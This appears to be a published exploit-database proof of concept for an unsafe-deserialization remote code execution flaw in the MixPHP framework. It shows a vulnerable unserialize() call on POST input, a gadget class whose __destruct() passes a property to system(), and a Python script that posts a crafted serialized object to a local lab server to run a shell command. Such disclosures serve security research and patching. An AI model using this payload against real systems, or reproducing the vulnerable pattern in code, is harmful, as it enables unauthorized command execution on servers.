# Exploit Title: MixPHP Framework 2.2.17 - Unsafe Deserialization Remote Code Execution
# Date: 2026-05-14
# Exploit Author: cardosource
# Vendor Homepage: https://github.com/mix-php/mix
# Software Link: https://github.com/mix-php/mix
# Version: 2.x through 2.2.17
# Tested on: Ubuntu 26.04 LTS / PHP 8.3.6
# CVE: CVE-2026-42471
"""
PHP applications that pass user-controlled input directly into
unserialize() may be vulnerable to arbitrary code execution when
attacker-controlled gadget chains are available.

The following proof of concept demonstrates exploitation through
a reachable __destruct() magic method.

Vulnerable Code
===============

$payload = $_POST["data"] ?? "";
unserialize($payload);

Gadget
======

class A {
    public $c = 'id>/tmp/p';

    public function __destruct() {
        system($this->c);
    }
}

Lab Setup
=========


php -S 0.0.0.0:8000

python3 php_deserialization_rce.py

"""

import requests

target = "http://127.0.0.1:8000/index.php"

payload = 'O:1:"A":1:{s:1:"c";s:9:"id>/tmp/p";}'

r = requests.post(target, data={"data": payload})

print(r.text)